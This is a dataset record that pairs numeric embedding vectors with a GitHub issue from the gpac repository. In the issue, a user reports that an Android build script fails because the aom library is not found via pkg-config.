-0.0000031286240300687496, 0.014126771129667759, -0.01574312336742878, -0.00019615482597146183, 0.016221504658460617, -0.0003510854148771614, 0.005671728402376175, -0.0015302794054150581, -0.016525929793715477, -0.001593701308593154, -0.006432790774852037, -0.00295002362690866, 0.017381219193339348, 0.005519515834748745, -0.0016571232117712498, 0.007124995347112417, 0.002091109985485673, 0.009886565618216991, -0.015018302015960217, -0.02418004535138607, -0.028644945472478867, -0.02016453444957733, 0.013148262165486813, -0.007980285212397575, -0.010140253230929375, -0.01303229108452797, 0.005425288807600737, -0.003350487444549799, 0.00874134711921215, -0.009371941909193993, 0.011082520708441734, -0.0006740840035490692, 0.015308230184018612, 0.0017712825210765004, -0.012292972765862942, 0.02841300331056118, -0.010850577615201473, 0.013162759132683277, -0.021092306822538376, -0.009545898996293545, 0.03687891736626625, 0.007099626585841179, -0.02025151252746582, 0.0028666690923273563, -0.017410213127732277, -0.007168484851717949, 0.014989309012889862, -0.01321349572390318, -0.018323488533496857, -0.0058058202266693115, 0.005309317726641893, -0.006751712411642075, -0.011553654447197914, -0.018410466611385345, 0.008944297209382057, 0.024020584300160408, 0.012474178336560726, 0.026542963460087776, -0.006414670497179031, -0.000025043149435077794, 0.003718334250152111, 0.0026600949931889772, -0.025905121117830276, -0.012488674372434616, 0.010473670437932014, 0.03029754012823105, 0.008523900993168354, 0.00986482109874487, -0.005247707944363356, -0.005697097163647413, 0.005649983882904053, -0.009364694356918335, 0.021179284900426865, -0.024832384660840034, 0.012568404898047447, -0.012474178336560726, 0.009299459867179394, -0.012053782120347023, 0.01613452658057213, -0.0077700866386294365, 0.0065922518260777, -0.015627151355147362, -0.025136809796094894, 0.01206102967262268, -0.018337983638048172, -0.013525169342756271, 0.00878483708947897, 0.014721125364303589, 0.006157358642667532, 0.01536621619015932, 0.02323777787387371, 0.0025006341747939587, 0.00010107862181030214, -0.00858913455158472, -0.028485486283898354, -0.0076251220889389515, 0.02216504141688347, 0.0336897037923336, -0.007418548222631216, 0.010480918921530247, -0.00918348878622055, 0.005269452463835478, -0.017076794058084488, -0.0011624324833974242, 0.013836842961609364, 0.018352480605244637, -0.009016779251396656, 0.00756713654845953, 0.02025151252746582, 0.012771354988217354, 0.011017287150025368, 0.002190772909671068, -0.00008499664545524865, 0.017830608412623405, -0.010075018741190434, 0.006382053252309561, -0.01538071222603321, -0.011560902930796146, -0.007251839153468609, 0.001182365114800632, -0.004925162065774202, -0.0013073968002572656, -0.006432790774852037, 0.0018881600117310882, -0.00819048285484314, 0.008871815167367458, -0.013162759132683277, -0.0018057115375995636, 0.029253795742988586, 0.010669372975826263, 0.020845865830779076, -0.0003893650427926332, 0.021237270906567574, 0.0218026302754879, 0.013329467736184597, -0.028456492349505424, 0.0023357372265309095, -0.02387562021613121, -0.0051752254366874695, 0.022266516461968422, 0.004066248890012503, -0.030123582109808922, 0.0131120216101408, 0.03455948829650879, -0.002665531123057008, -0.013684630393981934, 0.0044685248285532, 0.015250244177877903, -0.000010306055628461763, 0.0030877396930009127, -0.005780451465398073, 0.02323777787387371, -0.00933570135384798, 0.015888087451457977, -0.0020983582362532616, -0.014945819973945618, 0.007704852614551783, 0.009147247299551964, -0.007900554686784744, 0.011792846024036407, 0.0007687638280913234, -0.01988910138607025, -0.03566121682524681, -0.004678722936660051, 0.012053782120347023, -0.009038524702191353, 0.007494654506444931, 0.02155619114637375, 0.0038524263072758913, 0.0008000217494554818, -0.02661544643342495, 0.006490776780992746, -0.011394194327294827, 0.001626318320631981, -0.017642155289649963, -0.003093175822868943, 0.0053274380043148994, -0.008987787179648876, 0.027601202949881554, 0.020048562437295914, 0.00918348878622055, -0.0007479251944459975, -0.005845685489475727, 0.013771608471870422, 0.0036585365887731314, 0.026629941537976265, 0.01961367018520832, 0.006157358642667532, -0.02378864213824272, -0.0029373392462730408, 0.01074910257011652, -0.013314970768988132, -0.005842061247676611, -0.014605153352022171, -0.020570434629917145, 0.010306961834430695, -0.01955568417906761, 0.007929547689855099, 0.007404051721096039, -0.02351320907473564, -0.002754321787506342, -0.011792846024036407, -0.01848294772207737, -0.011945058591663837, 0.011097017675638199, -0.007317073177546263, -0.004979523830115795, -0.00803827028721571, -0.005356431007385254, 0.00012310640886425972, -0.02807958610355854, -0.005312941502779722, 0.005428913049399853, 0.002290436066687107, -0.014568912796676159, -0.019468706101179123, 0.009988040663301945, 0.002989888656884432, 0.0263690073043108, 0.01817852444946766, 0.011133258230984211, -0.017888594418764114, -0.000954046321567148, -0.011379697360098362, 0.01656942069530487, -0.0023411735892295837, -0.01583010144531727, -0.012967056594789028, 0.019541187211871147, -0.00039638677844777703, 0.011307215318083763, 0.006918421480804682, -0.017613163217902184, 0.003348675323650241, 0.014155764132738113, 0.0022705034352838993, 0.004504765849560499, 0.0019280252745375037, 0.003964773844927549, 0.010350450873374939, -0.0016616532811895013, -0.020019570365548134, -0.01580110937356949, -0.003441090229898691, 0.009067516773939133, 0.008958794176578522, -0.0017105787992477417, 0.0037147102411836386, 0.00966911856085062, 0.0006414670497179031, -0.007944043725728989, 0.016743376851081848, -0.00787156168371439, -0.0031402891036123037, -0.01878737285733223, -0.013235241174697876, 0.001127097406424582, -0.000057306202506879345, 0.015569166280329227, -0.03432754799723625, -0.0022505708038806915, 0.01717826910316944, 0.0034465263597667217, -0.026963360607624054, 0.013075780123472214, 0.005675352644175291, -0.0033776683267205954, -0.0029772042762488127, -0.0065197693184018135, -0.01598956249654293, -0.019628167152404785, -0.00019921266357414424, 0.003946653101593256, 0.01607654057443142, -0.009814083576202393, 0.006160982884466648, -0.010147500783205032, -0.016917334869503975, -0.001234914641827345, -0.000737505906727165, 0.005182473920285702, -0.01909179799258709, -0.00942267943173647, 0.023643678054213524, -0.026383502408862114, -0.013162759132683277, -0.020976334810256958, -0.005189721938222647, 0.017656652256846428, -0.014757365919649601, -0.009756097570061684, -0.011713115498423576, -0.012416192330420017, -0.0010745478793978691, 0.02141122706234455, -0.0077700866386294365, -0.012524915859103203, 0.019410720095038414, -0.01784510537981987, -0.000688127416651696, 0.025876127183437347, -0.012220490723848343, -0.019207770004868507, 0.028456492349505424, 0.012075526639819145, -0.00933570135384798, 0.019077302888035774, -0.02539774589240551, -0.006458159536123276, 0.014974812045693398, -0.010509911924600601, -0.008661617524921894, 0.006139238364994526, 0.007393179461359978, -0.025470228865742683, -0.017192766070365906, -0.016888340935111046, 0.01729424111545086, 0.005153480917215347, 0.03134128078818321, -0.002029500203207135, 0.01640995964407921, -0.002245134674012661, 0.017917588353157043, -0.012024789117276669, -0.007893306203186512, -0.01809154450893402, -0.003950277343392372, 0.007733845617622137, 0.0017223571194335818, 0.0038632985670119524, 0.00037011198583059013, 0.01933823712170124, -0.0030641830526292324, -0.0042909434996545315, 0.0008004747796803713, 0.011372449807822704, -0.01878737285733223, 0.005120864138007164, 0.019816620275378227, 0.0017857790226116776, 0.0023556698579341173, 0.00674446439370513, 0.0020113796927034855, 0.011821839027106762, -0.01778711937367916, 0.0032073352485895157, 0.010248975828289986, -0.018164027482271194, -0.012314717285335064, -0.01593157649040222, 0.001995071303099394, -0.019381728023290634, -0.009284963831305504, -0.000058495359553489834, -0.00141974410507828, 0.009386438876390457, -0.010133004747331142, 0.023991592228412628, -0.0005119051784276962, 0.004997644107788801, 0.002266879193484783, 0.035371288657188416, 0.00856014247983694, -0.0022831878159195185, -0.014141268096864223, 0.0024589570239186287, -0.005323814228177071, -0.001799369347281754, -0.0005726090166717768, -0.004359801299870014, 0.0053962962701916695, -0.024296017363667488, -0.0018347044242545962, 0.006258833687752485, 0.01175660453736782, 0.0200340673327446, -0.016554923728108406, -0.01814953051507473, 0.007733845617622137, -0.012416192330420017, 0.012539411894977093, 0.003515384392812848, -0.00007961711526149884, 0.018830863758921623, -0.02412205934524536, -0.009596636518836021, 0.002020440064370632, 0.0035715580452233553, 0.023165294900536537, 0.010176493786275387, -0.018164027482271194, 0.035980138927698135, -0.02107780985534191, 0.014257239177823067, -0.007233718875795603, 0.0024752654135227203, -0.005363679025322199, 0.024411989375948906, 0.0012593773426488042, -0.0034755191300064325, 0.0007347877835854888, -0.011727612465620041, -0.0008969666087068617, 0.027659188956022263, -0.008915304206311703, 0.004501141607761383, 0.026325518265366554, -0.008596383035182953, 0.025354256853461266, -0.012916319072246552, 0.008908056654036045, -0.004580872133374214, 0.003946653101593256, 0.006650237366557121, -0.015337223187088966, -0.008828326128423214, -0.020758887752890587, -0.020150037482380867, 0.004653354175388813, -0.005892798770219088, 0.0027307651471346617, 0.0028014350682497025, -0.006885804235935211, -0.02542673796415329, 0.013931069523096085, 0.014322472736239433, 0.02125176601111889, 0.015163266099989414, 0.004555503372102976, 0.029311781749129295, -0.007915050722658634, 0.01297430507838726, 0.0072264703921973705, -0.005349182989448309, 0.0009377378155477345, 0.003348675323650241, 0.011517413891851902, -0.000862084561958909, 0.0010872322600334883, -0.004896169528365135, 0.0005096401437185705, -0.021730149164795876, 0.0004068060661666095, -0.031225310638546944, 0.0049215382896363735, -0.03081941045820713, 0.02445547841489315, -0.02758670598268509, -0.0009178052423521876, -0.0012901823502033949, -0.00587830226868391, 0.009596636518836021, 0.020323995500802994, -0.052245136350393295, 0.013865835964679718, -0.016699887812137604, -0.009582140482962132, 0.03203710913658142, 0.0068278186954557896, -0.009299459867179394, -0.006414670497179031, -0.0010292466031387448, -0.011307215318083763, 0.002245134674012661, -0.025571702048182487, -0.0014904142590239644, 0.012032036669552326, -0.004330808762460947, -0.006226216908544302, -0.010952052660286427, -0.008052767254412174, -0.012278476729989052, 0.010335954837501049, 0.007994781248271465, -0.031138332560658455, 0.007951292209327221, 0.00279781105928123, -0.0006672887830063701, 0.012604646384716034, -0.0023882868699729443, -0.010009785182774067, 0.0012213242007419467, 0.016250498592853546, -0.007215598132461309, 0.00436342554166913, -0.0200340673327446, -0.01151016540825367, -0.005316565744578838, -0.011597144417464733, -0.02299133874475956, -0.0024027833715081215, 0.03302286937832832, -0.006215344648808241, -0.000011459824236226268, -0.004736708477139473, 0.021324248984456062, -0.022252021357417107, 0.02378864213824272, -0.012003044597804546, 0.018497444689273834, 0.0008090820047073066, -0.0021545318886637688, -0.031689196825027466, 0.0042909434996545315, 0.005910919513553381, -0.002170840511098504, 0.0051752254366874695, -0.018222013488411903, -0.0009060268639586866, -0.0057188416831195354, -0.0022070815321058035, -0.011821839027106762, 0.011444931849837303, 0.007146740332245827, 0.0005395390326157212, -0.004381545819342136, 0.025194795802235603, 0.014336969703435898, -0.002170840511098504, -0.00956039596349001, -0.00848041195422411, 0.0233247559517622, 0.025832638144493103, 0.009785090573132038, -0.00013545101683121175, 0.003100424073636532, -0.006269705947488546, 0.012582901865243912, -0.012488674372434616, 0.022556444630026817, 0.0029699562583118677, 0.005225962959229946, 0.004102489911019802, -0.0032254557590931654, 0.007813575677573681, 0.0001809788664104417, -0.024687420576810837, -0.0014722937485203147, -0.0021780887618660927, 0.0015819229884073138, 0.011212988756597042, 0.008806581608951092, -0.007396803703159094, 0.0006582285277545452, -0.006762584671378136, -0.018772877752780914, -0.006316819693893194, -0.0034646468702703714, 0.003511760151013732, 0.000016124447938636877, -0.015525677241384983, 0.0116623779758811, -0.000666382780764252, 0.007248214911669493, -0.0023502337280660868, -0.011930562555789948, 0.008792084641754627, 0.02354220300912857, 0.006131989881396294, -0.02091834880411625, -0.0043851700611412525, 0.01265538390725851, 0.012191497720777988, 0.006668358109891415, -0.006070380099117756, -0.007288080174475908, -0.007581633049994707, 0.00439966656267643, 0.005505019333213568, 0.010379443876445293, 0.0000013519620551960543, -0.012771354988217354, 0.001388939213939011, 0.025412242859601974, -0.0038632985670119524, 0.02216504141688347, -0.00011936904047615826, -0.010075018741190434, 0.0006097560981288552, 0.01251766737550497, -0.00022310912027023733, 0.0009567643865011632, -0.02141122706234455, 0.003783568274229765, 0.004490269348025322, 0.006657485384494066, 0.025586199015378952, -0.010198238305747509, -0.0026709672529250383, 0.003526256652548909, -0.008516652509570122, -0.011307215318083763, -0.000877940037753433, -0.016757873818278313, 0.012010292150080204, 0.010857826098799706, -0.004653354175388813, -0.004457652103155851, -0.002377414610236883, 0.006316819693893194, 0.01714927703142166, 0.0037799442652612925, 0.0018020875286310911, 0.0025749283377081156, -0.010038778185844421, 0.021875113248825073, -0.0007125901756808162, -0.004664226435124874, -0.009582140482962132, 0.007610626053065062, 0.006168230902403593, -0.028282536193728447, -0.014025296084582806, 0.014365962706506252, 0.0012068278156220913, 0.041517775505781174, 0.011270974762737751, -0.0009209763375110924, 0.0020838617347180843, 0.02487587369978428, -0.009886565618216991, -0.019178777933120728, -0.007697604596614838, -0.008458667434751987, 0.01596057042479515, 0.00567897642031312, -0.005298445466905832, -0.011408690363168716, 0.004001014865934849, 0.021092306822538376, -0.023585692048072815, 0.014721125364303589, 0.004566375631839037, 0.008487659506499767, 0.0035969268064945936, 0.02000507339835167, 0.011698619462549686, 0.011075273156166077, 0.011524662375450134, -0.00249338592402637, -0.015786612406373024, 0.0021092304959893227, 0.005523140076547861, -0.011734860017895699, 0.003848802298307419, -0.0003229985886719078, 0.012539411894977093, -0.013858587481081486, 0.0011769289849326015, 0.012619142420589924, -0.018772877752780914, -0.0131845036521554, -0.019439712166786194, -0.0019443336641415954, 0.004450404085218906, -0.010625883005559444, 0.02174464613199234, 0.006124741863459349, 0.007806327659636736, 0.01842496357858181, -0.013090276159346104, 0.01236545480787754, -0.0028793534729629755, -0.01011126022785902, 0.00825571734458208, 0.007240966893732548, 0.00019241745758336037, -0.005686224903911352, -0.009016779251396656, -0.007987532764673233, -0.01596057042479515, 0.02083137072622776, 0.0168448518961668, 0.032703947275877, 0.0061899758875370026, -0.014278983697295189, 0.0012602834030985832, -0.004200340714305639, 0.01912079192698002, -0.009618381038308144, 0.011930562555789948, 0.0014351465506479144, 0.014452940784394741, 0.0016245061997324228, -0.004696843214333057, 0.027847642078995705, 0.003049686551094055, -0.0037690717726945877, 0.005345558747649193, -0.0014813540037721395, 0.008683362044394016, 0.03812561184167862, -0.008915304206311703, 0.014402203261852264, 0.015873590484261513, -0.0014822599478065968, 0.005120864138007164, -0.021179284900426865, -0.013416445814073086, 0.009219729341566563, -0.025629688054323196, -0.006871307734400034, 0.000116537710709963, -0.033660709857940674, 0.02259993553161621, -0.016091037541627884, -0.01072011049836874, 0.005276700481772423, 0.005693472921848297, 0.006374805234372616, -0.0008154241950251162, 0.015090784057974815, -0.004240205977112055, 0.016453448683023453, -0.02119378186762333, -0.02216504141688347, 0.0071503641083836555, 0.0009073859546333551, 0.010437429882586002, 0.009241473861038685, -0.023426230996847153, 0.022817380726337433, 0.005758706945925951, 0.014489182271063328, -0.004642481915652752, -0.012677128426730633, -0.026818396523594856, 0.013952814042568207, -0.005106367636471987, 0.01343094278126955, 0.011734860017895699, -0.0012729677837342024, 0.008697858080267906, 0.002948211506009102, -0.010799840092658997, -0.0024354003835469484, 0.006276954431086779, -0.025716667994856834, -0.0023719784803688526, 0.020599426701664925, -0.013641140423715115, -0.0017848729621618986, -0.011713115498423576, -0.010517160408198833, 0.001346356002613902, -0.004754829220473766, -0.006954662501811981, 0.004512013867497444, 0.0011569963535293937, 0.006831442937254906, -0.015859095379710197, 0.00825571734458208, -0.011858079582452774, -0.012466929852962494, 0.008639872074127197, -0.008545645512640476, 0.0226869136095047, 0.0006709129083901644, 0.0010446490487083793, -0.011858079582452774, -0.011241981759667397, 0.007338817697018385, 0.018323488533496857, -0.003687529359012842, -0.0000828448319225572, -0.022643424570560455, 0.012263979762792587, 0.02974667400121689, -0.021425724029541016, 0.0016471568960696459, -0.0017232631798833609, 0.003997390624135733, -0.014076033607125282, -0.005468778312206268, 0.017743630334734917, 0.004421411082148552, -0.006824194453656673, -0.0010582393733784556, -0.024832384660840034, -0.004772949498146772, 0.007509151007980108, 0.02971768192946911, 0.02594861015677452, 0.022556444630026817, -0.0017685644561424851, -0.013314970768988132, -0.019570181146264076, 0.017192766070365906, 0.005389047786593437, 0.01329322624951601, -0.02091834880411625, -0.016149023547768593, 0.016801362857222557, 0.008755844086408615, 0.01265538390725851, 0.012177001684904099, -0.010466422885656357, -0.0218026302754879, -0.004033631645143032, 0.004555503372102976, 0.005247707944363356, -0.004798318259418011, 0.008364439941942692, -0.004160475451499224, 0.019787628203630447, 0.010915812104940414, 0.005465154070407152, -0.002419091761112213, 0.002169028390198946, 0.017497191205620766, 0.006534265819936991, -0.005225962959229946, 0.015844598412513733, 0.0048454320058226585, 0.005084623116999865, -0.010937556624412537, -0.0031276047229766846, -0.003406661096960306, -0.010067771188914776, -0.03281991928815842, -0.029094334691762924, 0.002419091761112213, -0.007944043725728989, 0.006610372103750706, -0.011858079582452774, 0.020063059404492378, 0.014061537571251392, 0.0013083028607070446, -0.012713368982076645, -0.012648135423660278, -0.00986482109874487, 0.016699887812137604, 0.016583915799856186, -0.02454245649278164, -0.017772624269127846, -0.020903851836919785, 0.007085130084306002, 0.004642481915652752, 0.011212988756597042, 0.010248975828289986, -0.007704852614551783, -0.005370927508920431, -0.011575399897992611, -0.012220490723848343, -0.008531149476766586, 0.032935891300439835, 0.0014487369917333126, 0.0026220418512821198, 0.01714927703142166, 0.0062733301892876625, -0.03386365994811058, -0.00825571734458208, 0.00787156168371439, 0.017975574359297752, -0.0019316492835059762, -0.02149820514023304, -0.02481788769364357, 0.016786865890026093, -0.013343963772058487, -0.004649729933589697, -0.007451165001839399, -0.005515891592949629, 0.008349943906068802, 0.01781611330807209, -0.010937556624412537, -0.00667560612782836, 0.004265574738383293, -0.00879933312535286, 0.006490776780992746, 0.02049795165657997, -0.015351719222962856, 0.019802123308181763, 0.0021110426168888807, 0.00245170877315104, 0.0037147102411836386, -0.01105352770537138, 0.016279490664601326, 0.0007886964012868702, 0.012662631459534168, -0.00451563810929656, 0.0053383102640509605, -0.0050048925913870335, -0.0068350667133927345, -0.0010645815636962652, 0.012227739207446575, -0.005124487914144993, 0.025571702048182487, -0.024382995441555977, 0.00559562211856246, -0.005331062246114016, 0.010067771188914776, -0.02365817502140999, -0.01930924504995346, 0.0002702225174289197, -0.02658645249903202, -0.013655637390911579, -0.0026709672529250383, -0.00392853282392025, -0.02259993553161621, -0.025818143039941788, -0.007668611593544483, -0.011452180333435535, 0.01406878512352705, 0.0012068278156220913, 0.002397347241640091, 0.02531076781451702, 0.035313304513692856, 0.010053274221718311, 0.007161236368119717, 0.003156597726047039, 0.023455224931240082, -0.009364694356918335, -0.0013200811808928847, -0.011118762195110321, -0.004627985414117575, 0.02058493159711361, 0.013677381910383701, 0.00803827028721571, 0.00942267943173647, 0.006316819693893194, 0.00796578824520111, -0.010712862014770508, 0.017366724088788033, 0.018352480605244637, 0.011017287150025368, 0.00166890153195709, 0.005997898057103157, -0.002527815056964755, -0.0010546152479946613, -0.0126698799431324, -0.01189432106912136, 0.004696843214333057, 0.02244047448039055, -0.012981553561985493, 0.04070597514510155, 0.022498460486531258, -0.011684122495353222, 0.01259014941751957, 0.011916065588593483, -0.012372703291475773, -0.0009558583842590451, 0.004403290804475546, 0.021396731957793236, 0.007994781248271465, 0.014742869883775711, -0.005765954963862896, -0.030703438445925713, 0.01574312336742878, 0.004678722936660051, 0.00579494796693325, 0.006610372103750706, 0.022918855771422386, -0.029978618025779724, -0.0026075453497469425, -0.012611893936991692, 0.029500234872102737, 0.0037654477637261152, -0.0012430688366293907, -0.00301525741815567, -0.010408436879515648, 0.006831442937254906, 0.05375276505947113, -0.004559127148240805, -0.005530388094484806, -0.0033994128461927176, 0.0017866850830614567, 0.006867683958262205, -0.03873446211218834, 0.024165548384189606, 0.009168991819024086, 0.011858079582452774, 0.015003805048763752, -0.01604754850268364, -0.0018238321645185351, -0.0010573334293439984, 0.001247599022462964, 0.0027833145577460527, 0.01928025297820568, -0.0036857174709439278, -0.01507628709077835, -0.009763346053659916, 0.016728879883885384, -0.006153734866529703, 0.004457652103155851, 0.0010700178099796176, 0.009313956834375858, 0.0013744428288191557, 0.0036820932291448116, 0.00046162071521393955, -0.018004566431045532, 0.00942267943173647, -0.009306708350777626, 0.018569927662611008, -0.023179791867733, -0.001388033153489232, -0.013786105439066887, -0.005341934505850077, -0.015235748142004013, 0.00908926222473383, 0.0006582285277545452, -0.00037283007986843586, -0.025296270847320557, 0.003241764148697257, -0.001202297629788518, 0.003384916577488184, 0.006545138079673052, -0.006559634581208229, 0.00042447360465303063, -0.00301525741815567, 0.028876889497041702, -0.0033015620429068804, -0.004091617651283741, 0.0032925016712397337, -0.01626499556005001, 0.007741093635559082, -0.005439785309135914, 0.007980285212397575, 0.008349943906068802, -0.007190229371190071, 0.038444533944129944, -0.009930054657161236, 0.019381728023290634, 0.015003805048763752, 0.005113615654408932, 0.015525677241384983, 0.0075308955274522305, -0.011945058591663837, -0.007835320197045803, 0.0011225673370063305, 0.010299713350832462, -0.005273076705634594, 0.018990322947502136, -0.00903127621859312, -0.017004312947392464, 0.001960642170161009, 0.01972964219748974, -0.011575399897992611, -0.01975863426923752, 0.006229840684682131, 0.011321712285280228, 0.010082267224788666, -0.001852824934758246, -0.005149856675416231, 0.0005399920046329498, 0.014779110439121723, 0.024904867634177208, 0.002004131441935897, -0.002127351239323616, 0.004544631112366915, -0.005102743394672871, 0.007277207914739847, -0.019874606281518936, -0.021034320816397667, -0.021585185080766678, -0.016091037541627884, 0.007375058718025684, -0.0011035407660529017, -0.012090022675693035, 0.003848802298307419, 0.007030768785625696, -0.025876127183437347, 0.02786213904619217, 0.004193092230707407, 0.008929801173508167, 0.00997354369610548, -0.016583915799856186, 0.02807958610355854, 0.0028938499744981527, 0.001690646167844534, 0.025383248925209045, -0.02536875382065773, -0.004258326254785061, -0.02241148054599762, -0.010270721279084682, -0.0015701445518061519, -0.010176493786275387, -0.002886601723730564, 0.00007259540143422782, -0.04421411082148552, -0.006577755324542522, -0.0037581995129585266, 0.010756351053714752, -0.0021309752482920885, 0.015351719222962856, -0.007085130084306002, -0.005421665031462908, -0.00857463851571083, -0.008009277284145355, -0.002948211506009102, 0.007436668500304222, -0.006711847148835659, -0.0010709237540140748, 0.011017287150025368, -0.0012376327067613602, -0.011524662375450134, 0.049345847219228745, 0.02199108526110649, -0.0008145181927829981, 0.015627151355147362, -0.011328959837555885, 0.014336969703435898, 0.004566375631839037, -0.02384662814438343, -0.02155619114637375, 0.025876127183437347, 0.005689848680049181, -0.004174971953034401, 0.019497698172926903, -0.01513427309691906, 0.003946653101593256, -0.005273076705634594, -0.019599173218011856, 0.005421665031462908, -0.02016453444957733, -0.018337983638048172, -0.012887326069176197, -0.004102489911019802, 0.023643678054213524, -0.02168666012585163, -0.005334686487913132, 0.003990142606198788, 0.0004591291362885386, 0.00040725909639149904, 0.008987787179648876, -0.017772624269127846, 0.0047838217578828335, -0.01997608132660389, -0.0018347044242545962, 0.00733156967908144, 0.0016843039775267243, -0.0026383502408862114, 0.01543869823217392, 0.008668865077197552, -0.020874859765172005, -0.012582901865243912, -0.006574131082743406, 0.005128112155944109, -0.0047765737399458885, -0.007864313200116158, 0.014061537571251392, -0.006421918515115976, -0.01817852444946766, -0.002516942797228694, 0.003500887891277671, -0.009154495783150196, 0.014010800048708916, 0.004591744393110275, 0.00874134711921215, 0.014837096445262432, 0.007806327659636736, -0.007835320197045803, 0.004997644107788801, -0.006106621120125055, -0.010053274221718311, -0.012626390904188156, -0.002643786370754242, -0.014489182271063328, -0.011502917855978012, 0.00966911856085062, -0.014568912796676159, -0.008132497780025005, 0.019715145230293274, 0.031080346554517746, -0.019541187211871147, 0.016091037541627884, -0.004627985414117575, -0.0033595478162169456, -0.00036218424793332815, 0.006642989348620176, -0.017105787992477417, -0.012909071519970894, 0.003165657864883542, -0.01536621619015932, -0.011118762195110321, -0.0023828507401049137, -0.01175660453736782, -0.00657050684094429, -0.008277461864054203, -0.006454535759985447, -0.0026709672529250383, -0.0035389410331845284, -0.030993368476629257, -0.018714891746640205, -0.011365201324224472, 0.02819555625319481, 0.022266516461968422, 0.0253397598862648, -0.009777842089533806, -0.0033686079550534487, -0.000423114572186023, -0.021599680185317993, -0.0115898959338665, 0.007005400024354458, -0.00040522051858715713, 0.008002029731869698, 0.003609611187130213, 0.03163120895624161, -0.011872576549649239, 0.002321240957826376, 0.0065813795663416386, -0.013271481730043888, 0.008393432945013046, -0.005225962959229946, -0.005265828222036362, -0.0023719784803688526, 0.014837096445262432, -0.005845685489475727, -0.008850070647895336, 0.0036077990662306547, 0.0262240432202816, 0.002246946794912219, 0.01640995964407921, 0.010292465798556805, 0.010517160408198833, 0.0034102851059287786, 0.0047765737399458885, -0.0034900156315416098, 0.03560323268175125, 0.000894701573997736, 0.001473199692554772, -0.012778603471815586, 0.0163519736379385, 0.018627913668751717, 0.002962708007544279, 0.016859348863363266, 0.003794440533965826, -0.018439458683133125, 0.006164607126265764, 0.01759866625070572, 0.0016299423296004534, 0.0008140651625581086, -0.012234986759722233, 0.01583010144531727, 0.022817380726337433, 0.018685897812247276, -0.01687384396791458, 0.04357627034187317, -0.007704852614551783, -0.004428659565746784, -0.009473416954278946, 0.00803827028721571, -0.016395462676882744, -0.015641648322343826, 0.005758706945925951, -0.014409451745450497, 0.024325009435415268, 0.004479397088289261, 0.020787881687283516, 0.009234226308763027, 0.006327691953629255, 0.0012874641688540578, 0.020121045410633087, 0.01227122824639082, -0.02747073583304882, -0.003676657099276781, -0.001853730995208025, 0.007197477389127016, -0.003439278108999133, 0.007121371570974588, 0.006498024798929691, 0.021599680185317993, -0.003644040087237954, -0.008226724341511726, 0.026455985382199287, 0.01420650165528059, -0.022730402648448944, -0.0025314390659332275, -0.007603377569466829, -0.013742615468800068, 0.013039538636803627, 0.02302033081650734, -0.0039067878387868404, -0.008828326128423214, 0.014307976700365543, 0.00956039596349001, 0.017526183277368546, -0.005479650571942329, -0.024064073339104652, 0.02652846649289131, 0.033573731780052185, 0.0019533939193934202, -0.012691624462604523, -0.02832602523267269, 0.01751168817281723, 0.007298952434211969, 0.001582828932441771, -0.014750117436051369, 0.015670640394091606, -0.012524915859103203, -0.022556444630026817, 0.02923930063843727, 0.0370238833129406, 0.0014677635626867414, 0.01681585982441902, 0.010988294146955013, 0.0038814193103462458, -0.02786213904619217, -0.012372703291475773, 0.00908926222473383 ]
303
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
ERROR: aom >= 0.1.0 not found using pkg-config I am following this tutorial: https://github.com/gpac/gpac/wiki/GPAC-Build-Guide-for-Android <GPAC_ROOT_DIR>/deps_android/build/android$ ./gpac_build_all_extra_libs /opt/android-ndk Using Ubuntu 18 x64
ERROR: aom >= 0.1.0 not found using pkg-config
https://api.github.com/repos/gpac/gpac/issues/1688/comments
12
2021-02-17T12:06:09
2021-02-23T09:29:35Z
https://github.com/gpac/gpac/issues/1688
810,125,428
1,688
false
This is a GitHub Issue repo:gpac owner:gpac Title : ERROR: aom >= 0.1.0 not found using pkg-config Issue date: --- start body --- ERROR: aom >= 0.1.0 not found using pkg-config I am following this tutorial: https://github.com/gpac/gpac/wiki/GPAC-Build-Guide-for-Android <GPAC_ROOT_DIR>/deps_android/build/android$ ./gpac_build_all_extra_libs /opt/android-ndk Using Ubuntu 18 x64 --- end body ---
408
[ -0.03791971504688263, 0.025089379400014877, -0.008373044431209564, -0.0039812130853533745, 0.022197196260094643, -0.014080044813454151, 0.000036682282370748, 0.046917613595724106, -0.04032391682267189, 0.030040603131055832, -0.03791971504688263, -0.015853440389037132, 0.007688680663704872, 0.012973160482943058, 0.0008294194121845067, 0.03877665847539902, -0.00231642322614789, 0.005974795203655958, 0.005105950403958559, 0.01953115314245224, 0.029969191178679466, -0.020923685282468796, 0.02737456001341343, 0.006099766120314598, -0.009723919443786144, -0.002285180613398552, -0.01627000980079174, 0.024922750890254974, -0.03444433584809303, 0.006677011959254742, 0.012116217985749245, -0.017543522641062737, -0.00024045724421739578, 0.035467907786369324, 0.055082373321056366, 0.019400231540203094, 0.037467438727617264, 0.07526813447475433, -0.02141166664659977, 0.0051327296532690525, -0.025541653856635094, -0.011039088480174541, -0.01647234335541725, -0.0035081093665212393, -0.018043404445052147, -0.0060075256042182446, 0.018662307411432266, 0.020042939111590385, -0.03806253895163536, -0.024470476433634758, 0.007182846311479807, -0.015056007541716099, -0.0031659272499382496, -0.02041189931333065, -0.006641305983066559, -0.051940251141786575, -0.003076662542298436, -0.011241422034800053, -0.01653185300529003, 0.0003336274530738592, -0.006742473226040602, 0.04596545547246933, -0.017257874831557274, 0.03225437179207802, -0.015603498555719852, 0.012937454506754875, 0.005549299065023661, 0.05336849018931389, -0.015865342691540718, 0.031468842178583145, 0.012973160482943058, -0.019662074744701385, -0.02164970524609089, -0.00002450134707032703, 0.02229241281747818, -0.05089287832379341, 0.03077852725982666, 0.023946788161993027, -0.029564524069428444, -0.0009082700125873089, -0.017400698736310005, 0.01080700010061264, -0.04606067016720772, -0.004162718541920185, -0.0055701276287436485, 0.010580861940979958, 0.006468727253377438, -0.052559152245521545, -0.02513698674738407, 0.01885274052619934, -0.02009054645895958, 0.03668190911412239, 0.03694375231862068, 0.021316450089216232, 0.046393927186727524, 0.021387862041592598, -0.021828236058354378, -0.026279576122760773, -0.017400698736310005, -0.024660907685756683, -0.01823383755981922, -0.057700809091329575, 0.060985758900642395, 0.008426603861153126, 0.013675377704203129, -0.010622519068419933, 0.034468140453100204, -0.02463710308074951, 0.0007438738830387592, 0.10378528386354446, 0.0014654315309599042, 0.0141871627420187, 0.0015889146598055959, 0.0003665438562165946, 0.014318084344267845, 0.037348419427871704, -0.05241633206605911, -0.009890547022223473, -0.03653908520936966, 0.018745621666312218, -0.006605600006878376, -0.015032203868031502, -0.02088797837495804, 0.0008190051885321736, -0.00832543708384037, 0.0005121571593917906, 